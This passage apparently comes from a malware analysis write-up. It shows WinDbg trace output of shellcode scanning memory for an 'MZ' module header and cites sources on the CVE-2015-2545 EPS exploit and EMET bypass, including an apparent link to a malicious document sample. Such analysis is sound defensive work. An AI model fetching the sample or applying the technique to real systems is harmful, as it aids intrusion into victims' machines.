eax=63bd0000 ebx=04371fa0 ecx=061e0f5e edx=775b70b4 esi=0011ea78 edi=00000000
eip=061e2f17 esp=061e0f5a ebp=002bc870 iopl=0 nv up ei pl nz na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000206
061e2f17 6681384d5a cmp word ptr [eax],5A4Dh ds:0023:63bd0000=458d
0:000> t
WARNING: Stack pointer is outside the normal stack bounds. Stack unwinding can be inaccurate.
eax=63bd0000 ebx=04371fa0 ecx=061e0f5e edx=775b70b4 esi=0011ea78 edi=00000000
eip=061e2f1c esp=061e0f5a ebp=002bc870 iopl=0 nv up ei ng nz na po cy
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000283
061e2f1c 7517 jne 061e2f35 [br=1]
0:000> t
WARNING: Stack pointer is outside the normal stack bounds. Stack unwinding can be inaccurate.
eax=63bd0000 ebx=04371fa0 ecx=061e0f5e edx=775b70b4 esi=0011ea78 edi=00000000
eip=061e2f35 esp=061e0f5a ebp=002bc870 iopl=0 nv up ei ng nz na po cy
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000283
061e2f35 2d00000100 sub eax,10000h
0:000> t
WARNING: Stack pointer is outside the normal stack bounds. Stack unwinding can be inaccurate.
eax=63bc0000 ebx=04371fa0 ecx=061e0f5e edx=775b70b4 esi=0011ea78 edi=00000000
eip=061e2f3a esp=061e0f5a ebp=002bc870 iopl=0 nv up ei pl nz na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000206
061e2f3a ebdb jmp 061e2f17
0:000> t
WARNING: Stack pointer is outside the normal stack bounds. Stack unwinding can be inaccurate.
eax=63bc0000 ebx=04371fa0 ecx=061e0f5e edx=775b70b4 esi=0011ea78 edi=00000000
eip=061e2f17 esp=061e0f5a ebp=002bc870 iopl=0 nv up ei pl nz na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000206
061e2f17 6681384d5a cmp word ptr [eax],5A4Dh ds:0023:63bc0000=8bf0
0:000> t
WARNING: Stack pointer is outside the normal stack bounds. Stack unwinding can be inaccurate.
eax=63bc0000 ebx=04371fa0 ecx=061e0f5e edx=775b70b4 esi=0011ea78 edi=00000000
eip=061e2f1c esp=061e0f5a ebp=002bc870 iopl=0 ov up ei pl nz ac pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000a16
061e2f1c 7517 jne 061e2f35 [br=1]
0:000> t
WARNING: Stack pointer is outside the normal stack bounds. Stack unwinding can be inaccurate.
eax=63bc0000 ebx=04371fa0 ecx=061e0f5e edx=775b70b4 esi=0011ea78 edi=00000000
eip=061e2f35 esp=061e0f5a ebp=002bc870 iopl=0 ov up ei pl nz ac pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000a16
061e2f35 2d00000100 sub eax,10000h
0:000> t
WARNING: Stack pointer is outside the normal stack bounds. Stack unwinding can be inaccurate.
eax=63bb0000 ebx=04371fa0 ecx=061e0f5e edx=775b70b4 esi=0011ea78 edi=00000000
eip=061e2f3a esp=061e0f5a ebp=002bc870 iopl=0 nv up ei pl nz na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000206
061e2f3a ebdb jmp 061e2f17
References
- https://www.hybrid-analysis.com/sample/3a65d4b3bc18352675cd02154ffb388035463089d59aad36cadb1646f3a3b0fc?environmentId=100
- http://www.eteamz.com/ginysteams/files/POno46543.docx
- https://www-cdf.fnal.gov/offline/PostScript/PLRM2.pdf
- https://www.ghostscript.com/
- http://blog.morphisec.com/exploit-bypass-emet-cve-2015-2545
- https://www.fireeye.com/content/dam/fireeye-www/blog/pdfs/twoforonefinal.pdf
- https://www.fireeye.com/blog/threat-research/2015/12/the_eps_awakens.html
- https://gist.github.com/subTee/54e72458af1c97f02e32
- http://casual-scrutiny.blogspot.jp/2016/02/cve-2015-2545-itw-emet-evasion.html
- https://blogs.msdn.microsoft.com/rihamselim/2012/03/14/breaking-on-module-load/
- https://stackoverflow.com/questions/10759661/manually-setting-breakpoints-in-windbg
- http://bbs.pediy.com/thread-216045.htm
- http://bbs.pediy.com/thread-216046.htm